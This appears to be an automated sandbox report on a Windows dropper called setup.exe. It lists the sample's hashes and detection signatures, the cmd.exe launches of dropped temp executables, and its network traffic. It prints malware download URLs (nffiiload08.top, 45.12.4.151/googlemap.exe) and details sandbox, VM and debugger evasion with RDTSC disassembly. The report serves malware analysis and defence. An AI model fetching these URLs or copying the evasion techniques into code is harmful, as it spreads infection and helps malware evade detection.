Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1472936
MD5: efe2c721d0d0d48abe27aeb0285d36b8
SHA1: f2e6c2b92d26fbf31c4cae9dbee1ff578ac86940
SHA256: 155ad546339267dea91ea573275e5912450d803ca537c9d454f48d9b7fd2749a
Tags: exe

Detection

Score: 81
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • setup.exe (PID: 4328 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: EFE2C721D0D0D48ABE27AEB0285D36B8)
    • cmd.exe (PID: 2488 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6976 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6832 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3384 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: setup.exe | Avira: detected
Source: https://2no.co/2URUU5m | Avira URL Cloud: Label: malware
Source: https://2no.co/D | Avira URL Cloud: Label: malware
Source: https://2no.co/ | Avira URL Cloud: Label: malware
Source: https://2no.co/2URUU5 | Avira URL Cloud: Label: malware
Source: https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.p | Avira URL Cloud: Label: malware
Source: setup.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: setup.exe | Joe Sandbox ML: detected
Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Joe Sandbox View | IP Address: 104.21.79.229
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected:
  GET /2URUU5 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 2no.co
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /json HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ip-api.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /googlemap.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 45.12.4.151
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 45.12.4.151
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: 2no.co
Source: global traffic | DNS traffic detected: DNS query: suomenen.com
Source: global traffic | DNS traffic detected: DNS query: nffiiload08.top
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12.4.151/googlemap.exe
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12.4.151/googlemap.exel
Source: setup.exe, setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/jsonB
Source: setup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ip-api.com/jsoncountryCodeinvalid
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/jsonh
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nffiiload08.top/download.php?file=4.exe
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nffiiload08.top/download.php?file=4.exeG;
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nffiiload08.top/download.php?file=4.exed:
Source: setup.exe, setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nffiiload08.top/download.php?file=6.exe
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nffiiload08.top/download.php?file=6.exes;
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2289141220.00000000011F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://suomenen.com/helka/trll.php
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2no.co/
Source: setup.exe, setup.exe, 00000000.00000002.2477887067.0000000001169000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2no.co/2URUU5
Source: setup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.p
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2no.co/2URUU5m
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2no.co/D
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713

System Summary

Source: setup.exe | Static PE information: section name:
Source: setup.exe | Static PE information: section name: .idata
Source: setup.exe | Static PE information: section name:
Source: setup.exe | Binary or memory string: OriginalFilename vs setup.exe
Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal81.evad.winEXE@13/2@4/3
Source: C:\Users\user\Desktop\setup.exe | File created: C:\Users\user\AppData\Roaming\Krol
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
Source: C:\Users\user\Desktop\setup.exe | File created: C:\Users\user\AppData\Local\Temp\1017.tmp
Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setup.exe | ReversingLabs: Detection: 71%
Source: setup.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ndfapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wdi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: atlthunk.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: setup.exe | Static file information: File size 2341888 > 1048576
Source: setup.exe | Static PE information: Raw size of pebpncdj is bigger than: 0x100000 < 0x211c00

Data Obfuscation

Source: C:\Users\user\Desktop\setup.exe | Unpacked PE file: 0.2.setup.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pebpncdj:EW;gegnfrcd:EW; vs :ER;.rsrc:W;t:W; :EW;pebpncdj:EW;gegnfrcd:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: gegnfrcd
Source: setup.exe | Static PE information: section name:
Source: setup.exe | Static PE information: section name: .idata
Source: setup.exe | Static PE information: section name:
Source: setup.exe | Static PE information: section name: pebpncdj
Source: setup.exe | Static PE information: section name: gegnfrcd
Source: setup.exe | Static PE information: section name: entropy: 6.99772907263561

Boot Survival

Source: C:\Users\user\Desktop\setup.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\setup.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\setup.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\setup.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\setup.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\setup.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\setup.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\setup.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 2E8C47 second address: 2E8C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD346629h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 2E8C6C second address: 2E8C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 4527D5 second address: 4527E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47CD34661Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 4527E7 second address: 4527F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F47CD36120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 4527F5 second address: 452825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F47CD34661Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47CD346626h 0x00000013 je 00007F47CD346616h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E2EA second address: 46E2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E2EE second address: 46E2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E2F2 second address: 46E2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E2FD second address: 46E306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E306 second address: 46E30C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E30C second address: 46E324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47CD34661Ah 0x0000000d jbe 00007F47CD346616h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E324 second address: 46E328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46E4B0 second address: 46E4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46EA74 second address: 46EA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47CD361206h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46EA85 second address: 46EA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD34661Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 46EA95 second address: 46EAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F47CD36120Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 4713A7 second address: 4713C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346628h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 4713C3 second address: 4713E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push ecx 0x0000000e jg 00007F47CD361206h 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 jc 00007F47CD361210h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 471447 second address: 471466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F47CD346616h 0x00000009 jmp 00007F47CD34661Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 471466 second address: 47146C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe | RDTSC instruction interceptor: First address: 47146C second address: 471471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471471 second address: 4714CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F47CD361208h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F47CD361208h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 adc dl, FFFFFFFBh 0x00000043 push 1C79DD2Fh 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4714CE second address: 4714D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4714D4 second address: 4714D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4715FF second address: 471604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471604 second address: 471609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471653 second address: 471712 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47CD346618h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F47CD346632h 0x00000011 nop 0x00000012 mov dx, ax 0x00000015 push 00000000h 0x00000017 mov esi, ebx 0x00000019 push E648A111h 0x0000001e jnp 00007F47CD346622h 0x00000024 jo 00007F47CD34661Ch 0x0000002a jp 00007F47CD346616h 0x00000030 add dword ptr [esp], 19B75F6Fh 0x00000037 mov edi, dword ptr [ebp+122D2C89h] 0x0000003d push 00000003h 0x0000003f jmp 00007F47CD346628h 0x00000044 push 00000000h 0x00000046 mov si, 34B4h 0x0000004a push 00000003h 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F47CD346618h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000019h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov edx, eax 0x00000068 call 00007F47CD346619h 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F47CD346622h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471712 second address: 47172F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47172F second address: 471753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F47CD346616h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F47CD34661Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007F47CD346616h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471753 second address: 471757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
